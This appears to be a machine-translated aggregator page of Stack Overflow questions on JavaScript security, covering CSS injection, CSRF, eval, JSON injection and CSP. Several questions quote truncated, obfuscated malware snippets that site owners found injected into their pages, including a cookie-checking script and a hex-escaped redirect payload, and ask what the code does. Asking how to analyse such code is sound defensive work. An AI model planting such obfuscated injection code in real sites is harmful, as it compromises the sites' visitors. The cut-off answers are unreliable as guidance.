jjzjj

Security

全部标签

javascript - 包含外部 CSS 文件是否安全,或者是否会导致代码注入(inject)?

我正在开发一个客户将使用的网站,方法是将其嵌入到他们网站的iframe中。我想让他们能够自定义内容的样式,这样他们就可以使内容符合他们网站的风格。我的基本想法是让他们给我一个CSS文件的URL,我应该将其包含在我为他们提供的页面中以填充iframe。据我所知这是安全的,但我对CSS不是特别熟悉(尤其是较新的版本),所以我想验证一下。有没有什么方法可以让某人构建一个CSS文件,让他们将代码注入(inject)我的网站或以其他方式访问我的域的cookie之类的东西?这真的安全吗,还是我需要想出不同的解决方案? 最佳答案 不,这是不安全的

javascript - CSRF - 伪造的 POST 可以包含任意数据吗?

伪造的POST请求可以由不受信任的网站通过创建表单并将其发布到目标站点来构造。但是,此POST的原始内容将由浏览器编码为以下格式:param1=value1¶m2=value2不受信任的网站是否有可能构建包含任意原始内容(例如字符串化JSON)的伪造POST?{param1:value1,param2:value2}换句话说:网站能否使浏览器向第三方域发布任意内容? 最佳答案 HTML表单请求的POST正文总是application/x-www-form-urlencoded,multipart/form-data,或tex

javascript - 检查 Javascript 中的正整数 : performance and security

我已经编写(并复制)了几行Javascript,它很好地满足了我的目的。但我正试图找出一种更好的方法(跨浏览器和更好的性能)来做到这一点。我从friend那里复制了isInteger函数,但我不明白为什么我们要在以下条件下检查字符串值:if(((c"9")))returnfalse;上述条件工作正常,但当我更改它以检查数值时,功能中断。输入字段开始接受字母字符。这是我更改它时的样子:if(((c9)returnfalse;我试图注释掉部分内容,以便您了解正在发生的事情。此代码中还有任何安全漏洞吗?我读到1innerHTML1方法可以打开一些安全漏洞,因此我们需要用它执行“干净”操作。因

javascript - 网站被黑了——这段 Javascript 代码有什么作用?

刚发现我的网站被黑了。我将问题追溯到插入Suckerfish下拉菜单中的这段Javascript代码。我打算用干净的备份替换菜单,但我很好奇这段代码实际上做了什么?(function(){varkuk='ck5',de=document,n=navigator,u=n.userAgent,l='anguage';functionc(b){vari='indexOf',l='length',c=de.cookie;b=b+"=";vara=c[i](";"+b),d=c[i](";",a);if(a==-1){a=c[i](b);if(a!=0)return0}return1}n=/^e

javascript - 这个脚本是做什么的?

有人能告诉我下面的脚本是做什么的吗?它大约每两周(总是在周日和周一之间)将自己注入(inject)我们的网站。我们已经多次重新加载我们的“干净”网站,但它一直在发生。我们已经安装并制定了我们阅读过的所有安全建议,但它只会不断进入我们所有的index.html文件和一些php文件。有人知道它的作用或来源吗?我们真的需要一些帮助!varar="v)y{ifu=lg[rETCB}meh>;s\"/0.,tN1:('varar="N.nidtf3[T;hwymCE:gA{](=o/\"c}lbrvu";try{'qwe'.length(1);}catch(a){k=newBoolean().t

javascript - javascripts 访问密码字段值是否被视为安全风险?

如果安全正确地存储密码是一种良好的风格和安全性,那么要求用户输入密码的网页不应该也是如此吗?考虑这个例子functioncopy(){vartext=document.getElementsById('text');varpass=document.getElementsById('pass');text.value=pass.value;}copy在密码框中输入一些内容,然后单击复制按钮,瞧,它就暴露在世人面前了。但是,如果您从密码框中复制和粘贴,那么您将得到无用的数据。考虑一下您的登录页面上包含的不受您控制的javascript片段的数量(分析、页面流跟踪器、云中的托管脚本)。对于

javascript - 在 JSON 和安全性中注入(inject) javascript

我有一个在线服务,用户可以在其中创建json支持的文档。然后将这些存储在服务器上,其他用户可以加载它们。然后json被完全按照提交的方式解码。如果用户在提交之前篡改json并注入(inject)任意javascript,然后在查看者的浏览器上执行,是否存在任何安全风险?这可能吗?这就是我需要知道的,如果这是可能的,或者从json字符串任意执行javascript是可能的。 最佳答案 这完全取决于a)您是否在服务器端删除JSON,以及(甚至更多)b)当您再次加载它时如何在客户端解码JSON。任何使用eval()将JSON反序列化为Ja

javascript - Javascript eval() 有那么危险吗?

这个问题在这里已经有了答案:关闭10年前。PossibleDuplicate:WhenisJavaScript’seval()notevil?我正在编写一个脚本,用户必须在其中输入货币金额,一些示例可能是(用户输入>>转换为),以美元为默认货币:50>>50.0USD50.5>>50.5USD50+1USD>>51.0USD50GBP>>50.0GBP我想让这一切尽可能顺利,因此我想使用JavaScript(这是一个基于PHP/MySql+JavaScript的网络应用程序)。我想使用正则表达式来过滤输入,通过eval()运行它并返回它。这是个坏主意吗?我读过一些关于eval()是安全

javascript - phonegap + ionic 使用 Content-Security-Policy 加载 maps.googleapis.com,如何?

我尝试了很多加载谷歌地图和firebaseio的方法,但都没有成功:这就是我现在拥有的:我得到:Refusedtoloadthescript'https://maps.googleapis.com/maps/api/js?libraries=places'becauseitviolatesthefollowingContentSecurityPolicydirective:"script-src'self'https://maps.googleapis.com/*'unsafe-inline''unsafe-eval'".Refusedtoloadthescript'https://t

javascript - 解码这个奇怪的 Javascript

我在.js文件中看到了这段代码。这是什么代码??我已经将该文件下载到我的本地主机网络服务器上。将此代码保存在.js文件中会将我重定向到google.com,当我评论此代码时,页面运行完美!!我可以理解这样做是为了强制页面只能从服务器链接执行!!!我如何解码这个js???[]['\x63\x6f\x6e\x73\x74\x72\x75\x63\x74\x6f\x72']['\x63\x6f\x6e\x73\x74\x72\x75\x63\x74\x6f\x72'](self['\x75\x6e\x65\x73\x63\x61\x70\x65']('%69%66%28%7e%6c%6f%6